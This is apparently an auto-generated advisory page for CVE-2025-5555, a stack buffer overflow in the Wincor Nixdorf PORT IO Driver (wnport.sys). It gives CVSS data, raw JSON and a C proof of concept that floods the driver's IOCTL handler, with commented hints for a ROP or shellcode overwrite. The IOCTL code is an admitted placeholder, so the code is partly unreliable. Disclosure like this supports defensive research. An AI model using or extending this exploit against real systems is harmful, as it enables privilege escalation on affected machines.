Security Vulnerability Report
CVE-2025-5555 CVSS 7.8 HIGH

CVE-2025-5555

Published: 2025-10-18 08:15:34
Last Modified: 2026-04-29 01:00:02

Description

A vulnerability has been found in Nixdorf Wincor PORT IO Driver up to 1.0.0.1. It affects the function sub_11100 in the library wnport.sys of the component IOCTL Handler. Manipulation leads to a stack-based buffer overflow. The attack requires local access. The exploit has been disclosed to the public and may be used. Upgrading to version 3.0.0.1 mitigates this issue. Upgrading the affected component is recommended. The vendor was contacted beforehand and was able to provide a patch very early.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Nixdorf Wincor PORT IO Driver < 1.0.0.1
Nixdorf Wincor PORT IO Driver 1.0.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/*
 * CVE-2025-5555 - Wincor Nixdorf PORT IO Driver Stack Buffer Overflow PoC
 * Vulnerability: Stack-based buffer overflow in sub_11100 (wnport.sys IOCTL Handler)
 * Target: Wincor Nixdorf PORT IO Driver <= 1.0.0.1
 * Author: Security Research Team
 *
 * This PoC demonstrates the stack-based buffer overflow vulnerability in the
 * IOCTL Handler of wnport.sys by sending an oversized buffer via DeviceIoControl.
 * The vulnerability can be leveraged for local privilege escalation to SYSTEM.
 */

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// IOCTL code for the vulnerable sub_11100 function in wnport.sys
// The exact IOCTL code should be reverse-engineered from the driver
#define IOCTL_VULNERABLE_CODE 0x222000 // Placeholder - adjust based on reverse engineering

// Device name for Wincor Nixdorf PORT IO Driver
#define DEVICE_NAME "\\\\.\\WnPort"

// Buffer size to trigger overflow (larger than the destination stack buffer)
#define OVERFLOW_SIZE 1024

int main(int argc, char *argv[])
{
    HANDLE hDevice = INVALID_HANDLE_VALUE;
    DWORD dwBytesReturned = 0;
    BOOL bResult = FALSE;

    // Input buffer: oversized data to trigger stack buffer overflow
    BYTE inBuffer[OVERFLOW_SIZE];
    // Output buffer
    BYTE outBuffer[OVERFLOW_SIZE];

    printf("[*] CVE-2025-5555 - Wincor Nixdorf PORT IO Driver Buffer Overflow PoC\n");
    printf("[*] Opening device: %s\n", DEVICE_NAME);

    // Open a handle to the vulnerable driver
    hDevice = CreateFileA(
        DEVICE_NAME,
        GENERIC_READ | GENERIC_WRITE,
        0,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL
    );

    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("[!] Failed to open device. Error: %lu\n", GetLastError());
        printf("[!] Make sure the Wincor Nixdorf PORT IO Driver is installed.\n");
        return 1;
    }

    printf("[+] Device opened successfully. Handle: 0x%p\n", hDevice);

    // Prepare the malicious input buffer
    // Fill with a recognizable pattern (e.g., 0x41 = 'A') to trigger overflow
    memset(inBuffer, 0x41, sizeof(inBuffer));

    // Optionally place a ROP chain or shellcode address at the offset
    // where the return address is saved on the stack
    // size_t retOffset = 0x100; // Adjust based on stack frame layout
    // *(DWORD64*)(inBuffer + retOffset) = (DWORD64)shellcodeAddress;

    // sizeof yields size_t, so cast it to match the %lu conversion
    printf("[*] Sending oversized buffer (%lu bytes) to trigger stack overflow...\n",
           (unsigned long)sizeof(inBuffer));

    // Trigger the vulnerability by sending the oversized buffer via DeviceIoControl
    bResult = DeviceIoControl(
        hDevice,
        IOCTL_VULNERABLE_CODE,
        inBuffer,
        sizeof(inBuffer),
        outBuffer,
        sizeof(outBuffer),
        &dwBytesReturned,
        NULL
    );

    if (!bResult) {
        printf("[!] DeviceIoControl failed. Error: %lu\n", GetLastError());
    } else {
        printf("[+] DeviceIoControl returned %lu bytes\n", dwBytesReturned);
    }

    // Clean up
    CloseHandle(hDevice);
    printf("[*] PoC execution completed.\n");

    return 0;
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-5555", "sourceIdentifier": "[email protected]", "published": "2025-10-18T08:15:34.460", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in Nixdorf Wincor PORT IO Driver up to 1.0.0.1. This affects the function sub_11100 in the library wnport.sys of the component IOCTL Handler. Such manipulation leads to stack-based buffer overflow. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. Upgrading to version 3.0.0.1 is able to mitigate this issue. Upgrading the affected component is recommended. The vendor was contacted beforehand and was able to provide a patch very early."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", 
"modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 6.8, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 3.1, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-121"}]}], "references": [{"url": "https://b.iakb.org/2025/06/26/Wincor-Nixdorf-PORT-IO-Driver-Buffer-Overflow/", "source": "[email protected]"}, {"url": "https://download.dieboldnixdorf.com/", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.329013", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.329013", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.604823", "source": "[email protected]"}]}}